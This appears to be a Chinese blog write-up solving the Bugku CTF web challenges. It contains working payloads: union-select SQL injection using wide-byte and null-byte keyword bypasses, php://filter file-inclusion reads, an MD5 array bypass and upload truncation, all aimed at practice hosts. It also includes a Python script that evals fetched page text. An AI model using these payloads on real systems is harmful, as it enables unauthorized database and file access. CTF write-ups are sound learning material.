Bugku-Web

Web2

最直接的办法:F12打开控制台,ctrl+f搜索flag关键字得到flag:KEY{Web-2-bugKssNNikls9100}
第二种是禁用当前页面的JS,然后查看源码看到flag
第三种直接在url前面加上view-source:,即直接访问view-source:http://120.24.86.145:8002/web2/也可以查看源码

文件上传测试

设置好浏览器代理用burpsuite劫持数据包

选择好文件上传

尝试%00截断

拿到flag:Flag:42e97d465f962c53df9549377b513c7e

计算题

查看源码可知对输入长度做了限制。我们进行修改

成功拿到flag:flag{CTF-bugku-0032}

web基础$_GET

打开看到如下页面,已经告诉我们源码

因此直接构造payload
120.24.86.145:8002/get/?what=flag

拿到flag:flag{bugku_get_su8kej2en}

web基础$_POST

打开看到源码

这次是需要POST提交,因此用hackbar模拟

拿到flag:flag{bugku_get_ssseint67se}

矛盾

num=_GET['num'];
if(!is_numeric(num)) { echonum;
if(num==1) echo 'flag{**********}'; } 提交合法的num就能拿到flag,URL访问:http://120.24.86.145:8002/get/index1.php?num=1'
flag:flag{bugku-789-ps-ssdf}

Web3

打开后发现一直弹窗,我们禁止弹窗然后查看源码

用js写的代码一直弹窗,底部有一串unicode字符应该是flag

解码后得到flag:KEY{J2sa42ahJK-HS11III}

sql注入

右键查看源码

发现是gb2312编码,题目是sql注入,猜测是宽字节注入
爆数据库payload:http://103.238.227.13:10083/?id=1%df%27%20union%20select%201,database()--+

最终payload:http://103.238.227.13:10083/?id=1%df%27%20union%20select%201,string from sql5.key--+

flag:KEY{54f3320dc261f313ba712eb3f13a1f6d}

域名解析

提示很清楚,将flag.bugku.com解析到120.24.86.145即可拿到flag
因此我们修改hosts文件将flag.bugku.com解析到120.24.86.145,添加如下规则

再次访问flag.bugku.com

拿到flag:KEY{DSAHDSJ82HDS2211}

SQL注入1

使用%00绕过关键字
爆出数据库为sql3:
http://103.238.227.13:10087/?id=-1%20uni%00on%20sel%00ect%201,database()%20fr%00om%20sql3.key%23
最终payload:http://103.238.227.13:10087/?id=-1 uni%00on sel%00ect 1,hash fr%00om sql3.key%23
flag:KEY{c3d3c17b4ca7f791f85e#$1cc72af274af4adef}

你必须让他停下

BurpSuite抓包直接Repeater几次

flag:flag{dummy_game_1s_s0_popular}

本地包含

http://120.24.86.145:8003/?hello=file(%22flag.php%22)

flag:flag{bug-ctf-gg-99}

变量1

利用超全局数组GLOBALS可以打印出所有变量
http://120.24.86.145:8004/index1.php?args=GLOBALS

flag:flag{92853051ab894a64f7865cf3c2128b34}

Web5

查看源代码

隐藏了一段字符,查资料得知是JS代码经过jsfuck编码的格式,我们复制到控制台执行

可以看到ctf{whatfk},提示字母大写,flag:CTF{WHATFK}

Web4

根据提示查看源代码

可以看到这是一段JS的代码,定义了两个变量,并且经过了url编码,我们用burpsuite解码得到一段代码

可以看到密码为67d709b2baa648cf6e87a7114f1,提交一下发现不对,应该是少了一部分,仔细再看看源码发现要在变量p2前面加上%35%34%61%61%32再进行解码

这才是正确的密码

提交得到flag:KEY{J22JK-HS11}

flag在index里

看到file参数想到文件包含漏洞
payload:http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
返回的就是index.php的源代码的base64编码,解码得到flag

flag:flag{edulcni_elif_lacol_si_siht}

备份是个好习惯

看到备份,首先想到源码泄露,访问一下http://120.24.86.145:8002/web16/index.php.bak,发现可以下载到源码

MD5比较绕过,只不过加了一点过滤。访问:http://120.24.86.145:8002/web16/?kkeyey1[]=a&kkeyey2[]=b
flag:Bugku{OH_YOU_FIND_MY_MOMY}

成绩单

打开看到一个表单,首先想到SQL注入
爆表:-1' union select 1,table_name,3,4 from information_schema.tables where TABLE_SCHEMA='skctf_flag' LIMIT 0,1
爆字段:-1' union select 1,column_name,3,4 from information_schema.columns where TABLE_SCHEMA='skctf_flag' and table_name='fl4g' LIMIT 0,1#
爆flag:-1' union select 1,skctf_flag,3,4 from fl4g#
flag:BUGKU{Sql_INJECT0N_4813drd8hz4}

秋名山老司机

直接用脚本计算出来然后POST提交

import re
import requests

s = requests.Session()
r = s.get("http://120.24.86.145:8002/qiumingshan/")
searchObj = re.search(r'^<div>(.*)=\?;</div>$', r.text, re.M | re.S)
d = {
"value": eval(searchObj.group(1))
}
r = s.post("http://120.24.86.145:8002/qiumingshan/", data=d)
print(r.text)

flag:Bugku{YOU_DID_IT_BY_SECOND}

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 194,670评论 5 460
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 81,928评论 2 371
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 141,926评论 0 320
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 52,238评论 1 263
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 61,112评论 4 356
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 46,138评论 1 272
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 36,545评论 3 381
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 35,232评论 0 253
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 39,496评论 1 290
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 34,596评论 2 310
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 36,369评论 1 326
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,226评论 3 313
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 37,600评论 3 299
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 28,906评论 0 17
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,185评论 1 250
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 41,516评论 2 341
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 40,721评论 2 335

推荐阅读更多精彩内容

  • 我使用的是火狐浏览器 使用火狐浏览器的hackbar插件 如果有错误的地方希望大家多多指出,多谢多谢 WEB2 点...
    yangc随想阅读 54,189评论 11 16
  • WEB2 看源代码得flag 文件上传测试 找一张图片上传,截包改后缀名为.php得flag 计算题 F12修改输...
    a2dd56f6ad89阅读 18,480评论 0 2
  • [{"reportDate": "2018-01-23 23:28:49","fluctuateCause": n...
    加勒比海带_4bbc阅读 765评论 1 2
  • 滴答~滴 看名字结合题目知道是摩斯密码,解密得到 KEY{BKCTFMISC} 聪明的小羊 翻过2个栅栏,首先说明...
    皮一下怎么了阅读 913评论 0 0
  • 最近过的日子和打仗似的,混沌刚入学,007刚开始,每天还要日更,还要工作,如此分裂的人生,到底是为了更优秀,还是把...
    秦家炎阅读 115评论 0 0